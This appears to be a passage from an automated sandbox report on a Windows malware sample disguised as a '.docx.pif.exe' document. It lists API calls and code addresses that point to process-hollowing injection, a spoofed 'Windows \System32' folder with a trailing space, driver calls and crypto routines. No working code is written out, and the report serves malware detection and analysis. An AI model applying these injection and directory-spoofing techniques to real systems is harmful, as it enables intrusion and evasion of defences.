Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997A92 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02997A92
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029979D8 GetModuleHandleW,GetProcAddress,NtProtectVirtualMemory,	0_2_029979D8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997942 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02997942
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	8_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	8_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	8_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	8_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B57898C NtQueryInformationToken,	8_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	8_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	8_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	8_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	10_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	10_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	10_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	10_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B57898C NtQueryInformationToken,	10_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	10_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	10_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	10_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	12_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	12_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	12_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	12_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B57898C NtQueryInformationToken,	12_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	12_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	12_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	12_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	14_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	14_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	14_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	14_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B57898C NtQueryInformationToken,	14_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	14_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	14_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	14_2_00007FF64B5789E4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B578114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	17_2_00007FF64B578114
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	17_2_00007FF64B58BCF0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5788C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	17_2_00007FF64B5788C0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B577FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	17_2_00007FF64B577FF8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B57898C NtQueryInformationToken,	17_2_00007FF64B57898C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	17_2_00007FF64B563D94
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B591538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	17_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5789E4 NtQueryInformationToken,NtQueryInformationToken,	17_2_00007FF64B5789E4
Source: C:\Users\Public\ger.exe	Code function: 24_2_00007FF7E0A09890 NtSetInformationKey,NtQueryKey,RegQueryInfoKeyW,lstrlenW,memset,RegEnumKeyExW,RegOpenKeyExW,RegCloseKey,	24_2_00007FF7E0A09890

Contains functionality to communicate with device drivers

Source: C:\Users\Public\alpha.exe

Code function: 8_2_00007FF64B565240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,

8_2_00007FF64B565240

Contains functionality to launch a process as a different user

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe

Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,

0_2_029981B8

Contains functionality to shutdown / reboot the system

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,

31_2_045967B4

Creates files inside the system directory

Source: C:\Users\Public\alpha.exe	File created: C:\Windows	Jump to behavior
Source: C:\Users\Public\alpha.exe	File created: C:\Windows \System32	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029820C4	0_2_029820C4
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040E800	3_2_0040E800
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040C838	3_2_0040C838
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040F1CA	3_2_0040F1CA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00411250	3_2_00411250
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004102D0	3_2_004102D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_0040B2E7	3_2_0040B2E7
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004102F0	3_2_004102F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004105F0	3_2_004105F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_00410673	3_2_00410673
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_2_004106B9	3_2_004106B9
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040E800	3_1_0040E800
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040C838	3_1_0040C838
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040F1CA	3_1_0040F1CA
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_00411250	3_1_00411250
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004102D0	3_1_004102D0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_0040B2E7	3_1_0040B2E7
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004102F0	3_1_004102F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004105F0	3_1_004105F0
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_00410673	3_1_00410673
Source: C:\Users\Public\Libraries\drbdmeyP.pif	Code function: 3_1_004106B9	3_1_004106B9
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B567D30	8_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5737D8	8_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56AA54	8_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B575554	8_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B561884	8_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B562C48	8_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B577854	8_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AC4C	8_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B568510	8_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56B0D8	8_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5718D4	8_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563F90	8_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B565B70	8_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B569B50	8_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B563410	8_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B566BE0	8_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AFBC	8_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56E680	8_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58EE88	8_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B570A6C	8_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B565240	8_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56D250	8_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B569E50	8_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B567650	8_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56372C	8_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B587F00	8_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B566EE4	8_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B591538	8_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B574224	8_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B562220	8_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58AA30	8_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B564A30	8_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B568DF8	8_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B56CE10	8_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B58D9D0	8_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 8_2_00007FF64B5681D4	8_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B567D30	10_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5737D8	10_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56AA54	10_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B575554	10_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B561884	10_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B562C48	10_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B577854	10_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AC4C	10_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B568510	10_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56B0D8	10_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5718D4	10_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563F90	10_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B565B70	10_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B569B50	10_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B563410	10_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B566BE0	10_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AFBC	10_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56E680	10_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58EE88	10_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B570A6C	10_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B565240	10_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56D250	10_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B569E50	10_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B567650	10_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56372C	10_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B587F00	10_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B566EE4	10_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B591538	10_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B574224	10_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B562220	10_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58AA30	10_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B564A30	10_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B568DF8	10_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B56CE10	10_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B58D9D0	10_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF64B5681D4	10_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5737D8	12_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B570A6C	12_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56AA54	12_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B575554	12_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B574224	12_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B561884	12_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B562C48	12_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B577854	12_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AC4C	12_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B567D30	12_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B568510	12_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56B0D8	12_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5718D4	12_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563F90	12_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B565B70	12_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B569B50	12_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B563410	12_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B566BE0	12_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AFBC	12_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56E680	12_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58EE88	12_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B565240	12_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56D250	12_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B569E50	12_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B567650	12_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56372C	12_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B587F00	12_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B566EE4	12_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B591538	12_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B562220	12_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58AA30	12_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B564A30	12_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B568DF8	12_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B56CE10	12_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B58D9D0	12_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 12_2_00007FF64B5681D4	12_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5737D8	14_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B570A6C	14_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56AA54	14_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B575554	14_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B574224	14_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B561884	14_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B562C48	14_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B577854	14_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AC4C	14_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B567D30	14_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B568510	14_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56B0D8	14_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5718D4	14_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563F90	14_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B565B70	14_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B569B50	14_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B563410	14_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B566BE0	14_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AFBC	14_2_00007FF64B58AFBC
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56E680	14_2_00007FF64B56E680
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58EE88	14_2_00007FF64B58EE88
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B565240	14_2_00007FF64B565240
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56D250	14_2_00007FF64B56D250
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B569E50	14_2_00007FF64B569E50
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B567650	14_2_00007FF64B567650
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56372C	14_2_00007FF64B56372C
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B587F00	14_2_00007FF64B587F00
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B566EE4	14_2_00007FF64B566EE4
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B591538	14_2_00007FF64B591538
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B562220	14_2_00007FF64B562220
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58AA30	14_2_00007FF64B58AA30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B564A30	14_2_00007FF64B564A30
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B568DF8	14_2_00007FF64B568DF8
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B56CE10	14_2_00007FF64B56CE10
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B58D9D0	14_2_00007FF64B58D9D0
Source: C:\Users\Public\alpha.exe	Code function: 14_2_00007FF64B5681D4	14_2_00007FF64B5681D4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5737D8	17_2_00007FF64B5737D8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B570A6C	17_2_00007FF64B570A6C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56AA54	17_2_00007FF64B56AA54
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B575554	17_2_00007FF64B575554
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B574224	17_2_00007FF64B574224
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B561884	17_2_00007FF64B561884
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B562C48	17_2_00007FF64B562C48
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B577854	17_2_00007FF64B577854
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AC4C	17_2_00007FF64B58AC4C
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B567D30	17_2_00007FF64B567D30
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B568510	17_2_00007FF64B568510
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B56B0D8	17_2_00007FF64B56B0D8
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B5718D4	17_2_00007FF64B5718D4
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563F90	17_2_00007FF64B563F90
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B565B70	17_2_00007FF64B565B70
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B569B50	17_2_00007FF64B569B50
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B563410	17_2_00007FF64B563410
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B566BE0	17_2_00007FF64B566BE0
Source: C:\Users\Public\alpha.exe	Code function: 17_2_00007FF64B58AFBC	17_2_00007FF64B58AFBC
